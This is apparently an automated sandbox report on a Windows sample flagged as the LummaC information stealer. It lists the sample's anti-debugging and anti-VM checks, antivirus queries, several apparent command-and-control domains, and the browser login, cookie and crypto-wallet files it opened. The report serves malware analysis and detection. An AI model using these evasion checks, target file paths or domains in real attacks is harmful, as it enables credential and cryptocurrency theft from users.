Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D508E second address: 66D5094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D5094 second address: 66D50F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC22D01ECD6h 0x0000000a popad 0x0000000b pushad 0x0000000c jno 00007FC22D01ECCCh 0x00000012 jnl 00007FC22D01ECD2h 0x00000018 jmp 00007FC22D01ECD2h 0x0000001d push ebx 0x0000001e jmp 00007FC22D01ECD2h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 668D4D2 second address: 668D4EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B5h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D45BD second address: 66D45C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D45C1 second address: 66D45E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8ABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC22CC1B8AFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D45E1 second address: 66D45E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D45E6 second address: 66D462B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B4h 0x00000009 jmp 00007FC22CC1B8B9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 jnl 00007FC22CC1B8A8h 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007FC22CC1B8A6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D4D2D second address: 66D4D46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D4D46 second address: 66D4D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D4D54 second address: 66D4D82 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22D01ECC6h 0x00000008 js 00007FC22D01ECC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FC22D01ECCEh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC22D01ECCEh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D4EDC second address: 66D4F06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC22CC1B8B3h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D877C second address: 66D879E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC22D01ECCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007FC22D01ECCCh 0x00000016 jo 00007FC22D01ECC6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D879E second address: 66D8801 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22CC1B8ACh 0x00000008 jp 00007FC22CC1B8A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 mov dword ptr [ebp+122D3BB6h], ebx 0x00000017 call 00007FC22CC1B8A9h 0x0000001c pushad 0x0000001d jmp 00007FC22CC1B8B2h 0x00000022 ja 00007FC22CC1B8A8h 0x00000028 popad 0x00000029 push eax 0x0000002a push ecx 0x0000002b je 00007FC22CC1B8A8h 0x00000031 pushad 0x00000032 popad 0x00000033 pop ecx 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 jmp 00007FC22CC1B8ACh 0x0000003d mov eax, dword ptr [eax] 0x0000003f jnp 00007FC22CC1B8B4h 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 9A8E92 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: B60C8E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: BE87B2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 66C8E1D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 651B152 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 651DF42 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 66D5BAC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 6765397 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 652297C instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Code function: 0_3_014F1775 sldt word ptr [eax+0000007Ah]

0_3_014F1775

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 2352	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 2052	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 2828	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 3700	Thread sleep time: -38019s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000002.1876753898.00000000063DC000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1877430428.00000000066AA000.00000040.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B85000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001447000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWZ
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 0zBsv1tnt4.exe, 00000000.00000002.1876753898.00000000063DC000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1877430428.00000000066AA000.00000040.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: NTICE
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: SICE
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Code function: 0_2_0098E110 LdrInitializeThunk,

0_2_0098E110

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: 0zBsv1tnt4.exe	String found in binary or memory: hummskitnj.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: appliacnesot.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: cashfuzysao.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: inherineau.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: screwamusresz.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: rebuildeso.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: scentniej.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: mindhandru.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: prisonyfork.buzz

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior

Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OProgram Manager
Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000002.1877430428.00000000066AA000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: {Program Manager

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 0zBsv1tnt4.exe, 00000000.00000003.1626030544.000000000150B000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001462000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 0zBsv1tnt4.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 0zBsv1tnt4.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"
Source: 0zBsv1tnt4.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0T
Source: 0zBsv1tnt4.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: 0zBsv1tnt4.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keysto
Source: 0zBsv1tnt4.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 0zBsv1tnt4.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
